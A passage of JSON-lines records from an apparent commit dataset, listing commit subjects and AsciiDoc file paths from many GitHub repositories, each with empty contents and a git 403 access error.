2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5540df765187fc68c65e6f667bc594cfeab483cf","subject":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","message":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4fad8c0b36e91d938b5ef77ccb147e2344b375b","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2036e370e298b1f5767c3a4e2896fa7b5b6f9e41","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-20-Using-Your-Wrist-To-Power-Your-Smartphone.adoc","new_file":"_posts\/2018-01-20-Using-Your-Wrist-To-Power-Your-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97808f4679d103cc57004b154dd3d2f622db3119","subject":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e2b777cc9e047efb9e1baaa6f21ffca944c185a","subject":"Update 2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","message":"Update 2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","new_file":"_posts\/2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e1bd95ea730772d83494c03907feea8b68a454","subject":"Create README-es.adoc","message":"Create README-es.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dffee7726199be4e05fd2460fda8ac0a6c659169","subject":"added wercker status","message":"added wercker status","repos":"mmjmanders\/algorithmicpasswords","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmjmanders\/algorithmicpasswords.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0418718b082db912bd9f830fd95be76f4a210b97","subject":"add editor.backend.output.dir key","message":"add editor.backend.output.dir key\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31ba422a4865f7ae1fc74c23ef3fc0a6b086c1f3","subject":"Updated documentation","message":"Updated documentation\n","repos":"resilience4j\/resilience4j,goldobin\/resilience4j,RobWin\/circuitbreaker-java8,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79c85dcace3447be0dbf79a2d8221671f33b0dbd","subject":"Update 2016-09-05-Information-Technology-1-What-is-a-network.adoc","message":"Update 2016-09-05-Information-Technology-1-What-is-a-network.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-05-Information-Technology-1-What-is-a-network.adoc","new_file":"_posts\/2016-09-05-Information-Technology-1-What-is-a-network.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84ac96845a3cd232b4d1d5b38e4a3e34707969d9","subject":"Update 2015-09-17-First-Blog.adoc","message":"Update 2015-09-17-First-Blog.adoc","repos":"tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io","old_file":"_posts\/2015-09-17-First-Blog.adoc","new_file":"_posts\/2015-09-17-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tongqqiu\/tongqqiu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c79b9b35dbc1cc77f0e9ebc4d9bae1ff87e93767","subject":"Update 2016-02-12-Interface-are-awesome.adoc","message":"Update 2016-02-12-Interface-are-awesome.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-02-12-Interface-are-awesome.adoc","new_file":"_posts\/2016-02-12-Interface-are-awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8fb27ff7070b6ae5325002ce2c80d520488e17e","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1867f3a0a069b559ffdb28650bedc9a1072b0f","subject":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","message":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2741f31c1b0e84415a311475f52e801ed8cab8de","subject":"y2b create post Is This The Coolest Keyboard Yet?","message":"y2b create post Is This The Coolest Keyboard Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-18-Is-This-The-Coolest-Keyboard-Yet.adoc","new_file":"_posts\/2017-05-18-Is-This-The-Coolest-Keyboard-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bd9db28a1c4068a4eafc0f7e8245475d35421db","subject":"Update 2017-09-18-Functional-Rotterdam-5th-Edition.adoc","message":"Update 2017-09-18-Functional-Rotterdam-5th-Edition.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Functional-Rotterdam-5th-Edition.adoc","new_file":"_posts\/2017-09-18-Functional-Rotterdam-5th-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"636daeea33d6b114fe0a87b52f1fe5ede5cb8884","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"263607ba6acb4ba056daaf6cbc62384c056a0065","subject":"Publish 2013-5-12-Linux-Notes.adoc","message":"Publish 2013-5-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Linux-Notes.adoc","new_file":"2013-5-12-Linux-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"452d2b202f2c63717088f982620e527311d14037","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee5245c35e613f504b00b0c68c60c037e3ac566","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da682bbe171c6a5b56c25592556fca55f8b519bd","subject":"Configuring fluentd (td-agent) to aggregate container logs","message":"Configuring fluentd (td-agent) to aggregate container logs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/aggregate_logging.adoc","new_file":"admin_guide\/aggregate_logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e3b02be88f1b81461b28829dfcdb98580c6297e","subject":"Document rollback support","message":"Document rollback support\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/rollback.adoc","new_file":"docs\/rollback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"1b8191c587469da8e75ab4c1e5cbb48dfe2c19e9","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a36fe8ea79c8da394fc913cf124dab7c0f831482","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dcae47426fd52ef4516dedd53cc888e0689fac0","subject":"1.4.3 release blog","message":"1.4.3 release blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-07-03-release-1.4.3.adoc","new_file":"_blog-src\/_posts\/2018-07-03-release-1.4.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e2b6929bcaeb5d0b796ebe4faad2d08a758bdd4","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"776ba2dc3b8bcba49ef8909f1991de87f60809f7","subject":"Update 2015-08-04-Hello-world.adoc","message":"Update 2015-08-04-Hello-world.adoc","repos":"GDGSriLanka\/blog,GDGSriLanka\/blog","old_file":"_posts\/2015-08-04-Hello-world.adoc","new_file":"_posts\/2015-08-04-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GDGSriLanka\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42515a36e66ce4655beb7aa18a73bd7244f0ef01","subject":"Update 2015-09-06-Second-Post.adoc","message":"Update 2015-09-06-Second-Post.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-06-Second-Post.adoc","new_file":"_posts\/2015-09-06-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e74bce2886e5727c3508783130dc6486f449e400","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b115c0ac0f18d137de5d1ea24a014565d14e2c85","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76997e777a572fc566be932944b5fb422c66ae08","subject":"Update 2017-04-10-Indecisione.adoc","message":"Update 2017-04-10-Indecisione.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-10-Indecisione.adoc","new_file":"_posts\/2017-04-10-Indecisione.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1811851a9d6eb704f7f0c7ba48f1e347cfe8e048","subject":"Add Debugging flaky tests blog post","message":"Add Debugging flaky tests blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-10-21-flaky-tests.adoc","new_file":"_posts\/2022-10-21-flaky-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25d7144ccedceb3f7c7fcb0b692eac5c8123a6b1","subject":"add to NOTES","message":"add to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd606cc5b5e4d95496201587c3a0bc024c0aa637","subject":"scala file added","message":"scala file added\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Scala.adoc","new_file":"Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"d0642fb8195a48259fe2d52114cab0ea06b8f890","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9b016bb8d96e1a099e176ab49153b1c5e77db97","subject":"add conj","message":"add conj\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojureconj.adoc","new_file":"content\/events\/2016\/clojureconj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2174c87c77398d0932af99cf4b8359c302663f51","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f41915b163e318680be03ddd81437433cefe36f","subject":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94d6f63b488da392cc7e5b92cfe641c6399ee187","subject":"Initial shared infra proposal (#3455)","message":"Initial shared infra proposal (#3455)\n\n* Initial shared infra proposal\r\n\r\nIssue #3416","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/shared-infrastructure.adoc","new_file":"documentation\/design\/proposals\/shared-infrastructure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5b39ce85ed43e02ce99136c9ad73f51a202cb76","subject":"[DOCS] Fix broken inter-page link","message":"[DOCS] Fix broken inter-page link\n","repos":"Rygbee\/elasticsearch,alexshadow007\/elasticsearch,petabytedata\/elasticsearch,lmtwga\/elasticsearch,scorpionvicky\/elasticsearch,mnylen\/elasticsearch,dongjoon-hyun\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,maddin2016\/elasticsearch,nrkkalyan\/elasticsearch,kaneshin\/elasticsearch,btiernay\/elasticsearch,hafkensite\/elasticsearch,huanzhong\/elasticsearch,robin13\/elasticsearch,sposam\/elasticsearch,awislowski\/elasticsearch,lzo\/elasticsearch-1,jango2015\/elasticsearch,F0lha\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Siddartha07\/elasticsearch,mmaracic\/elasticsearch,infusionsoft\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra5-rc,springning\/elasticsearch,wbowling\/elasticsearch,sposam\/elasticsearch,bestwpw\/elasticsearch,alexshadow007\/elasticsearch,uschindler\/elasticsearch,franklanganke\/elasticsearch,Ansh90\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,jpountz\/elasticsearch,kalburgimanjunath\/elasticsearch,rlugojr\/elasticsearch,knight1128\/elasticsearch,snikch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,pritishppai\/elasticsearch,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,zhiqinghuang\/elasticsearch,andrejserafim\/elasticsearch,Charlesdong\/elasticsearch,pritishppai\/elasticsearch,JSCooke\/elasticsearch,dpursehouse\/elasticsearch,MichaelLiZhou\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,AndreKR\/elasticsearch,onegambler\/elasticsearch,iacdingping\/elasticsearch,Stacey-Gammon\/elasticsearch,martinstuga\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,masterweb121\/elasticsearch,obourgain\/elasticsearch,schonfeld\/elasticsearch,Charlesdong\/elasticsearch,Charlesdong\/elasticsearch,nomoa\/elasticsearch,hydro2k\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,ImpressTV\/elasticsearch,achow\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,JSCooke\/elasticsearch,Brijeshrpatel9\/elasticsearch,clintongormley\/elasticsearch,bestwpw\/elasticsearch,fforbeck\/elasticsearch,MichaelLiZhou\/elasticsearch,pablocastro\/elasticsearch,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,mm0\/elasticsearch,geidies\/elasticsearch,tebriel\/elasticsearch,lmtwga\/elasticsearch,hafkensite\/elasticsearch,dongjoon-hyun\/elasticsearch,rhoml\/elasticsearch,C-Bish\/elasticsearch,mm0\/elasticsearch,njlawton\/elasticsearch,cwurm\/elasticsearch,weipinghe\/elasticsearch,fred84\/elasticsearch,ImpressTV\/elasticsearch,slavau\/elasticsearch,winstonewert\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,xingguang2013\/elasticsearch,scottsom\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,njlawton\/elasticsearch,girirajsharma\/elasticsearch,andrestc\/elasticsearch,brandonkearby\/elasticsearch,awislowski\/elasticsearch,ckclark\/elasticsearch,Shepard1212\/elasticsearch,markharwood\/elasticsearch,JervyShi\/elasticsearch,adrianbk\/elasticsearch,snikch\/elasticsearch,kingaj\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,achow\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,knight1128\/elasticsearch,bawse\/elasticsearch,rmuir\/elasticsearch,Ansh90\/elasticsearch,ZTE-PaaS\/elasticsearch,Charlesdong\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,MetSystem\/elasticsearch,Uiho\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,ivansun1010\/elasticsearch,mohit\/elasticsearch,rhoml\/elasticsearch,lzo\/elasticsearch-1,artnowo\/elasticsearch,wittyameta\/elasticsea